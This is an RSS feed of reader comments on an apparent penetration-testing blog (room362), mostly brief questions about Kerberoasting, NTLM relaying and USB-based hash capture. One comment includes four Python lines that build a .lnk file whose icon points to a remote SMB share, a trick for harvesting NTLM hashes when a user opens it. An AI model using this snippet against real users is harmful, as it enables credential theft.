<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title>room362 - Latest Comments</title><link>http://room362.disqus.com/</link><description></description><atom:link href="https://room362.disqus.com/comments.rss" rel="self"></atom:link><language>en</language><lastBuildDate>Sun, 07 May 2017 02:38:24 -0000</lastBuildDate><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3292723083</link><description>&lt;p&gt;Does this still work?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">3e4r5t6789</dc:creator><pubDate>Sun, 07 May 2017 02:38:24 -0000</pubDate></item><item><title>Re: 
              Effective NTLM / SMB Relaying
            </title><link>https://room362.com/post/2014#comment-3268100574</link><description>&lt;p&gt;hiya i would like to ask two questions  1) if on target mashine the password not set and the rules set like &amp;gt;not allow blank password use  ..if that methods works in workgroup in LAN?   2) how to do the same with intercepter-ng?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Malcolm Norton</dc:creator><pubDate>Fri, 21 Apr 2017 23:54:11 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3248518947</link><description>&lt;p&gt;```&lt;br&gt;import pylnk&lt;br&gt;link = pylnk.create("link.lnk")&lt;br&gt;link.icon = "\\\\192.168.5.100\\test.ico"&lt;br&gt;&lt;a href="http://link.save" rel="nofollow noopener" target="_blank" title="link.save"&gt;link.save&lt;/a&gt;()&lt;br&gt;```&lt;/p&gt;&lt;p&gt;Those 4 python lines have the same effect... Just need a way to force the user to load the link.lnk file generated...&lt;/p&gt;&lt;p&gt;Cheers&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">pimps</dc:creator><pubDate>Sun, 09 Apr 2017 23:57:12 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3235390403</link><description>&lt;p&gt;Does this work on a mac as well, or is it only windows?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">M8</dc:creator><pubDate>Sat, 01 Apr 2017 17:48:04 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3200159336</link><description>&lt;p&gt;very good,nice .&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Abdiya Chlouma</dc:creator><pubDate>Sun, 12 Mar 2017 07:48:38 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3174871640</link><description>&lt;p&gt;Same approach, but additionally highjacking every public host to force authenticated SMB request on a 5$ Pi Zero: &lt;a href="https://github.com/mame82/P4wnP1" rel="nofollow noopener" target="_blank" title="https://github.com/mame82/P4wnP1"&gt;https://github.com/mame82/P...&lt;/a&gt;&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">mame82</dc:creator><pubDate>Sat, 25 Feb 2017 15:23:48 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3167024094</link><description>&lt;p&gt;Hello everybody. I have the problem that my windows machine is not recognize the usbarmory as a networkinterface. Also a driver get installed. But still no recognition. On linux it works fine. What is the problem and how can I fix this ???&lt;/p&gt;&lt;p&gt;Greets,&lt;br&gt;Barney&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Barney</dc:creator><pubDate>Tue, 21 Feb 2017 05:39:52 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3161927294</link><description>&lt;p&gt;HI. implemented the same on a Pi Zero. Now the Problem is, that on Win 10 Home 64bit (Build 14393) it takes about 15 minutes till the first request to "http://&amp;lt;&lt;a href="http://responder.host" rel="nofollow noopener" target="_blank" title="responder.host"&gt;responder.host&lt;/a&gt;&amp;gt;/wpad.dat" is sent. Any ideas on that ?&lt;/p&gt;&lt;p&gt;Best regards MaMe82&lt;/p&gt;&lt;p&gt;Update: Windows responds immediately but never sends NTLM auth, thanks to MS16-112&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">mame82</dc:creator><pubDate>Sat, 18 Feb 2017 05:03:41 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3124821125</link><description>&lt;p&gt;Mmm is a LM or NTLM or NTLMv2 hash????&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Vito De Laurentis</dc:creator><pubDate>Sat, 28 Jan 2017 10:08:09 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3121958132</link><description>&lt;p&gt;hey, nice test, i tried this out but i stuck on win-screen. It seemed to be loading the user-acc but then it jumped back to login-page&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Kasun1906</dc:creator><pubDate>Thu, 26 Jan 2017 16:25:25 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3097020081</link><description>&lt;p&gt;any countermeasure  ?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">dene dene</dc:creator><pubDate>Fri, 13 Jan 2017 03:40:40 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3091954293</link><description>&lt;p&gt;hehe, the other gist has also vanished !!&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Iam Nikhil</dc:creator><pubDate>Tue, 10 Jan 2017 03:21:33 -0000</pubDate></item><item><title>Re: Buying Internal Domain Access</title><link>https://room362.com/post/2016/12-29-buying-internal-domain-access/#comment-3091090018</link><description>&lt;p&gt;I'm an iOS Engineer, just getting into pentesting and information security.  What you described was impressive.  I see the first link is no longer valid, but the second one for xamarin still exists.  Thanks for the post.  I'm getting into bug bounties, and I wonder if something like this might come in handy one day.  That is amazing man.  Thanks for the posts.&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Plerisei</dc:creator><pubDate>Mon, 09 Jan 2017 14:56:38 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3089491540</link><description>&lt;p&gt;if this is using basic responder then i t shouldnt matter what the TLD is ?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Leon Teale</dc:creator><pubDate>Sun, 08 Jan 2017 15:13:16 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3085700651</link><description>&lt;p&gt;Nice test, any considerations taken if the dc's top level domain isn't a .com? Something like a .org?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">N8</dc:creator><pubDate>Fri, 06 Jan 2017 06:36:51 -0000</pubDate></item><item><title>Re: Kerberoasting - Part 3</title><link>https://room362.com/post/2016#comment-3082160579</link><description>&lt;p&gt;test&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">mubix</dc:creator><pubDate>Wed, 04 Jan 2017 01:05:37 -0000</pubDate></item></channel></rss>